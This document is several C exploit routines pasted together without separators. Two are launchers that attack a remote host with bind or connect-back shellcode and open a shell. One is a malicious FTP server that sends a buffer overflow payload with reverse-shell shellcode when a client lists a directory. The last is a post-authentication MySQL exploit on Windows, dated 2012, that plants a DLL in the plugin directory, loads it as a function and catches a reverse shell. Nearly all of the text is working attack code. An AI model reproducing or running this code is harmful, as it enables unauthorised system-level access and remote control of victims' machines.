int main ( int argc, char* argv[] ) { int s, option; args myargs; system ( "clear" ); header (); parse_arguments ( argc, argv, &myargs ); s = connect_to_remote_host ( myargs.tip, myargs.tport ); printf ( "--[ select shellcode\n" ); printf ( " |\n" ); printf ( " |- [0] bind\n" ); printf ( " `- [1] cb\n" ); printf ( ">> " ); scanf ( "%d", &option ); switch ( option ) { case 0: printf ( "--[ sorry, does not work yet :/\n" ); /* printf ( "--[ using bind shellcode\n" ); if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); } connect_to_bindshell ( myargs.tip, 3879 ); */ break; case 1: printf ( "--[ using cb shellcode\n" ); if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); } start_reverse_handler ( 45295 ); break; default: printf ( "--[ invalid shellcode!\n" ); exit ( 1 ); } close ( s ); return 0; }
int main ( int argc, char* argv[] ) { int s; unsigned long xoredip; unsigned short xoredcbport; struct sockaddr_in remote_addr; struct hostent *host_addr; if ( argc != 2 ) if ( argc != 4 ) { fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); system ( "clear" ); header (); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } printf ( "--[ connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( YELLOW "done!\n" NORMAL); if ( argc == 4 ) { xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } start_reverse_handler ( argv[3] ); } else { if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } connect_to_bindshell ( argv[1], 4444 ); } }
void handle_cmd ( int s, int s2, char* ip ) { int listenfd, connfd; int i = 1; int tmp[4]; unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll char* a = NULL; char* cmd; char out[128], buffer[1024], addr[32]; pid_t childpid; socklen_t clilen; struct sockaddr_in cliaddr, servaddr; while ( 1 ) { cmd = get_cmd ( s ); if ( strncmp ( cmd, "PWD", 3 ) == 0 ) { bzero ( &out, 128 ); strcpy ( out, "257 \"/\" is current directory.\r\n" ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } } else if ( strncmp ( cmd, "CWD", 3 ) == 0 ) { bzero ( &out, 128 ); strcpy ( out, "257 \"/\" is current directory.\r\n" ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } } else if ( strncmp ( cmd, "TYPE", 4 ) == 0 ) { bzero ( &out, 128 ); strcpy ( out, "200 Type set to A..\r\n" ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } } else if ( strncmp ( cmd, "PASV", 4 ) == 0 ) { bzero ( &addr, 32 ); a = ( char* ) strtok ( ip, "." ); tmp[0] = ( int ) a; while ( a != NULL ) { a = ( char* ) strtok ( NULL, "." ); tmp[i] = ( int )a; i++; } bzero ( &out, 128 ); sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } printf ( "--[ entering passive mode...\n" ); if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 ) { printf ( RED "socket failed!\n" NORMAL ); exit ( 1 ); } bzero ( &servaddr, sizeof ( servaddr ) ); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl ( INADDR_ANY ); servaddr.sin_port = htons ( PASV ); bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ); if ( listen ( listenfd, 1 ) == -1 ) { printf ( RED "listen failed!\n" NORMAL ); exit ( 1 ); } clilen = sizeof ( cliaddr ); if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 ) { close ( listenfd ); printf ( RED "accept failed!\n" NORMAL ); exit ( 1 ); } close ( listenfd ); printf ( "--[" GREEN " passive connection established!\n" NORMAL ); handle_cmd ( s, connfd, addr ); } else if ( strncmp ( cmd, "LIST", 4 ) == 0 ) { printf ( "--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL ); printf ( "--[ w00d w00d, let`s kick his ass...\n" ); bzero ( &buffer, 1024 ); memcpy ( buffer, head, sizeof ( head ) - 1 ); memset ( buffer + 68, 0x90, 255 ); memcpy ( buffer + 321, "\xeb\x46", 2 ); strncat ( buffer, ( unsigned char * ) &ret, 4 ); memset ( buffer + 327, 0x90, 66 ); memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 ); strcat ( buffer, "\r\n" ); bzero ( &out, 128 ); strcpy ( out, "150 Here comes the directory listing.\r\n" ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } printf ( "--[ sending packet [ %d bytes ]...", strlen ( buffer ) ); if ( write ( s2, buffer, strlen ( buffer ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } printf ( GREEN "done!\n" NORMAL); bzero ( &out, 128 ); strcpy ( out, "226 Transfer ok\r\n" ); printf ( "--[ confirming..." ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } printf ( GREEN "done!\n" NORMAL); close ( s2 ); start_reverse_handler ( argv3 ); } else { bzero ( &out, 128 ); strcpy ( out, "550 command not supported\r\n" ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "\twrite failed!\n" NORMAL ); exit ( 1 ); } } } }
int main(int argc, char *argv[]) { MYSQL *c; unsigned char *target = (unsigned char*)0; unsigned char *username = (unsigned char*)0; unsigned char *password = (unsigned char*)0; unsigned char *payload = (unsigned char*)0; unsigned char *payload2 = (unsigned char*)0; unsigned char *thequery = (unsigned char*)0; unsigned char *stat = "INSERT INTO spearhead(weapon) VALUES('%s')"; unsigned char *dump = (unsigned char*)0; MYSQL_ROW plugin_dir; FILE *input = (FILE*)0; int size=-1; int j; unsigned int querylen, randno; MYSQL_RES *result; pid_t pid; printf("Oracle MySQL Windows SYSTEM Level Exploit (post-auth) zeroday\n""Copyright (C) 2012 Kingcope\n"); while((j=getopt(argc, argv, "u:p:t:")) != -1) { switch(j) { case 'u': username = optarg; break; case 'p': password = optarg; break; case 't': target = optarg; break; default: usage(argv); } } if (username == (unsigned char*)0 || password == (unsigned char*)0 || target == (unsigned char*)0) usage(argv); c = mysql_init(NULL); if (c == NULL) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } if (mysql_real_connect(c, target, username, password, "mysql", 0, NULL, 0) == NULL) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } printf("Successfully Logged into MySQL Server\n""Att3mpt to R00T the b0x!\n"); if (mysql_query(c, "drop database spearhead") && (mysql_errno(c) != 1008)) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } if (mysql_query(c, "create database spearhead") && (mysql_errno(c) != 1007)) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } if (mysql_query(c, "use spearhead")) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } if (mysql_query(c, "create table spearhead(weapon LONGBLOB)") && (mysql_errno(c) != 1050)) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } input = fopen("payload.dll", "r+b"); if (input == (FILE*)0) { printf("Error: Could not open payload.dll\n"); exit(1); } fseek(input, 0L, SEEK_END); size = ftell(input); if (size < 0) { printf("Error: Could not retrieve filesize of payload.dll\n"); exit(1); } fseek(input, 0L, SEEK_SET); payload = (unsigned char *) malloc(size); if (payload == (unsigned char *)0) { printf("Error: Could not allocate memory\n"); exit(1); } if (fread(payload, size, 1, input) < 1) { printf("Error: Could not read payload.dll\n"); exit(1); } fclose(input); payload2 = (unsigned char *) malloc(size*2+1); if (payload2 == (unsigned char *)0) { printf("Error: Could not allocate memory\n"); exit(1); } mysql_real_escape_string(c, payload2, payload, size); thequery = (unsigned char*) malloc(size*2+strlen(stat)+2); if (thequery == (unsigned char*)0) { printf("Error: could not allocate buffer\n"); exit(1); } querylen = snprintf(thequery, size*2+strlen(stat)+2, stat, payload2); if (mysql_real_query(c, thequery, querylen)) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } dump = (unsigned char*) malloc(4096); if (dump == (unsigned char*)0) { printf("Error: could not allocate buffer\n"); exit(1); } mysql_query(c, "SELECT REPLACE(REPLACE(@@plugin_dir, '/', '\\\\') ,'\\\\', '\\\\\\\\')"); result = mysql_store_result(c); if (result == NULL) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } plugin_dir = mysql_fetch_row(result); srandom(time(NULL)); randno = random(); printf("Save payload to %s\\payload%d.dll\n", plugin_dir[0], randno); querylen = snprintf(dump, 4096, "SELECT weapon FROM spearhead INTO DUMPFILE '%s\\\\payload%d.dll'", plugin_dir[0], randno); if (mysql_real_query(c, dump, querylen)) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } pid = fork(); if (pid == 0) { sleep(1); snprintf(dump, 4096, "CREATE FUNCTION mysqljackpot RETURNS STRING SONAME 'payload%d.dll'", randno); if (mysql_query(c, dump)) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } if (mysql_query(c, "drop database spearhead")) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } if (mysql_query(c, "drop function mysqljackpot")) { printf("Error %u: %s\n", mysql_errno(c), mysql_error(c)); exit(1); } wait(0); } else { start_reverse_handler(443); } printf("Done.\n"); mysql_close(c); }